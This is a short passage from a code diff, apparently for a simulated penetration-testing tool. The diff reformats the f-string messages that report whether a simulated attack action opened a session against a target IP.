{target_ip}\n[*] Session opened.' - return f'[-] {action_name} failed against {target_ip}\n[-] No session created.' + return ( + f'[-] {action_name} failed against {target_ip}\n[-] No session created.' + ) key = 'success' if success else 'failure' samples = bucket.get(key, [])